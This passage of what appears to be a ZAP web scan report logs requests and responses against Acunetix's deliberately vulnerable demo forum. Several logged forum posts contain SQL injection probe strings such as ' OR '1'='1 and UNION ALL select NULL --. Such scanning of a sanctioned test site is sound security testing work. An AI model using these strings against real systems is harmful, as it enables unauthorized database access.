--> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4149 |
| Response Body - size: 4,149 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" 